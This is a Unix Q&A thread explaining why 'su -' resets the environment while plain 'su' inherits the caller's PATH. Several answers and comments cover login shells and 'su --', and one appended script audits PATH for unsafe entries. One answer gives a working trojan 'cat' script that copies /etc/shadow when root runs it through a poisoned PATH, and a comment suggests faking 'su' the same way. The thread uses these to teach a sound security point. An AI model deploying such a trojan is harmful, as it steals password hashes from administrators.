I don't understand why `su -` is preferred over `su` to log in as root.
4 Answers
`su -` invokes a login shell after switching the user. A login shell resets most environment variables, providing a clean base.
`su` just switches the user, providing a normal shell with an environment nearly the same as the old user's.
Imagine you're a software developer with normal user access to a machine and your ignorant admin just won't give you root access. Let's (hopefully) trick him.
```
$ mkdir /tmp/evil_bin
$ vi /tmp/evil_bin/cat
```

```bash
#!/bin/bash
test $UID != 0 && { echo "/bin/cat: Permission denied!"; exit 1; }
/bin/cat /etc/shadow &>/tmp/shadow_copy
/bin/cat "$@"
exit 0
```

```
$ chmod +x /tmp/evil_bin/cat
$ PATH="/tmp/evil_bin:$PATH"
```
Now you ask your admin why you can't `cat` the dummy file in your home folder; it just won't work!

```
$ ls -l /home/you/dummy_file
-rw-r--r-- 1 you wheel 41 2011-02-07 13:00 dummy_file
$ cat /home/you/dummy_file
/bin/cat: Permission denied!
```
If your admin isn't that smart or just a bit lazy, he might come to your desk and try with his super-user powers:
```
$ su
Password: ...
# cat /home/you/dummy_file
Some important dummy stuff in that file.
# exit
```
Wow! Thanks, super admin!
```
$ ls -l /tmp/shadow_copy
-rw-r--r-- 1 root root 1093 2011-02-07 13:02 /tmp/shadow_copy
```
He, he.
You may have noticed that the corrupted `$PATH` variable was not reset. This wouldn't have happened if the admin had invoked `su -` instead.
- Don't forget to set an `umask` like 000 or it won't work. – Lekensteyn Oct 22 '11 at 08:48
- Also worth knowing, although not an answer: there is also `su --`, which behaves like `su -`, but does not change the current directory. – Simon Richter Feb 07 '11 at 12:25
- I'm embarrassed to say that with years of experience I didn't know about `su --`. That's really useful and I'm going to start using it today. Thanks. – Michael Feb 07 '11 at 13:55
- `su --` is the same as `su`. – Mikel Feb 07 '11 at 20:08
- `--` is a flag that most programs interpret as "nothing after this should be taken as a flag". Useful for grepping for things which start with a dash. – David Mackintosh Feb 09 '11 at 04:43
- One could as well just put a `su` file inside the PATH. It's not so hard to mimic the behavior of the real `su`. The super-user has been careless anyway :-) – Stéphane Gimenez Feb 28 '12 at 18:53
- `su --` is NOT the same as `su -`: `--` tells a getopt(s) (or similar) option handler to stop processing the command line for further options (useful, for example, if the rest contains filenames which could start with a `-`). I.e., in `rm -i -- -f`, `-f` is then treated as a regular argument, so here as the *name of the file* to `rm -i`, and *not* as an additional `-f` option to the `rm` command. So `su --` is just `su` and not `su -`! So `su --` would be just as unsafe in the (funny and instructive) example given by wag. Use `su -`. – Olivier Dulac Dec 26 '12 at 15:05
- The security example is clever, but are there real security problems if I `ssh` into a remote server? Because I can't really think of any... – Martin Tournoij Mar 09 '16 at 14:56
- @OlivierDulac - Could you please point me to some resource on what the `-` does in general? Say it is appended to something other than `su`. For context, I am trying to understand what this command does: `xauth -f $XAUTH nmerge -`. Thanks a lot. – Matteo Sep 13 '20 at 17:11
- @Matteo Always look at the man pages. On several commands (tar, awk, and some others), `-` could mean stdin, and for others it could mean something else (ex: su). Man pages are your friend ^^ – Olivier Dulac Sep 13 '20 at 17:48
- @OlivierDulac - Thanks for the super quick reply. I looked at the man page for [xauth](https://www.x.org/archive/X11R6.8.1/doc/xauth.1.html) before commenting but it doesn't explain what `-` is for. How could I figure it out? I posted a question about my problem (https://unix.stackexchange.com/questions/609255/xauthority-for-gui-in-a-docker-container) if you are able to help! Thanks! – Matteo Sep 13 '20 at 18:00
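The lesson of wag's answer and Stéphane's comment is that whatever is in the caller's `PATH` runs with root's privileges after a plain `su`. The check below is an added example, not code from the answer or the comments: a small POSIX `sh` audit of a `PATH` value that reports the entries someone else could control (empty entries, relative entries, and existing world-writable directories). The function name `unsafe_path_entries`, the wrapper `audit_current_path`, and the temporary directory built for the demonstration are all constructed for this example.

```sh
#!/bin/sh
# Added example (not from the original answer or comments): audit a PATH
# value for entries that another user could plant a command in.
# Prints one "entry<TAB>reason" line per finding and returns 1 if any
# were found, 0 if the PATH looks clean.
unsafe_path_entries() {
    rest="$1:"            # trailing colon so the loop consumes the last entry
    found=0
    while [ -n "$rest" ]; do
        entry=${rest%%:*}
        rest=${rest#*:}
        reason=""
        if [ -z "$entry" ]; then
            # "::" or a leading/trailing ":" means "the current directory"
            reason="empty entry resolves to the current directory"
        else
            case $entry in
                /*)
                    if [ -d "$entry" ]; then
                        # ls mode string: char 9 is the world-write bit;
                        # -L follows symlinks so a link to a dir is judged
                        # by the target's mode, not the link's
                        mode=$(ls -ldL "$entry" | cut -c1-10)
                        case $mode in
                            ????????w?) reason="world-writable directory" ;;
                        esac
                    fi ;;
                *)
                    reason="relative entry depends on the current directory" ;;
            esac
        fi
        if [ -n "$reason" ]; then
            printf '%s\t%s\n' "$entry" "$reason"
            found=1
        fi
    done
    return $found
}

# Convenience wrapper: audit the PATH of the shell you are about to use.
audit_current_path() {
    unsafe_path_entries "$PATH"
}

# Stand-alone demonstration on a constructed PATH: a world-writable staging
# directory (created here just for the demo) in front of the system
# directories, plus an empty entry, mirroring the /tmp/evil_bin setup above.
demo_dir=$(mktemp -d)
chmod 777 "$demo_dir"
sample_path="$demo_dir::/usr/bin:/bin"
if unsafe_path_entries "$sample_path"; then
    echo "no suspicious PATH entries"
else
    echo "PATH contains entries that should be investigated before running as root"
fi
rmdir "$demo_dir"
```

Running `audit_current_path` before typing a command at someone else's prompt, or as part of a login-script sanity check, makes the problem visible; `su -` sidesteps it by replacing the caller's `PATH` with root's own login environment instead of inheriting it.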
`su -` logs you in completely as root, whereas `su` makes it so you are pretending to be root.
The most obvious example of this is that `~` is root's home directory if you use `su -`, but your own home directory if you use `su`.
Depending on your system, it may also mean differences in prompt, `PATH`, or history file.
So if you are part of a team administering a system, and your colleague gives you a command to run, you know it will work the same if you are both using `su -`, but if you are both using `su`, there may be differences due to you having different shell configurations.
On the other hand, if you want to run a command as root but using your own configuration, then maybe `su` is better for you.
Also don't forget about `sudo`, which has a `-s` option to start a shell running as root. Of course, this has different rules as well, and they change depending on which distribution you are using.
- When I `su` I get `~` and `$HOME` both evaluating to /root. Is the behavior you describe specific to certain shells or OS versions or something? It's my understanding that `~` can be expanded by the kernel. I've got zsh as my (and root's) shell. – JasonWoof Feb 08 '11 at 00:05
- Your `.bashrc` or `/etc/bashrc` or `/etc/profile.d` scripts are setting `PATH`. Look for `if [ $UID -eq 0 ]` or something like that. – Mikel Feb 08 '11 at 01:14
- Your example does not work for me. I get the same directory resolved either way. – Daniel W. Apr 18 '16 at 14:45
- @Mikel - Could you please point me to some resource on what the `-` does in general? Say it is appended to something other than `su`. For context, I am trying to understand what this command does: `xauth -f $XAUTH nmerge -`. Thanks a lot. – Matteo Sep 13 '20 at 17:12
The main difference is:
`su - username` sets up the shell environment as if it were a clean login as the specified user; it accesses and uses the specified user's environment variables.
`su username` just starts a shell with the current environment settings for the specified user.
If `username` is not specified with `su` or `su -`, the root account is implied as the default.
I use `su --` when I'm in a directory as a regular user but want to switch to root and remain in the same directory after the switch. When you use `su -` it switches the user to root and also takes you to /root, which is root's home directory.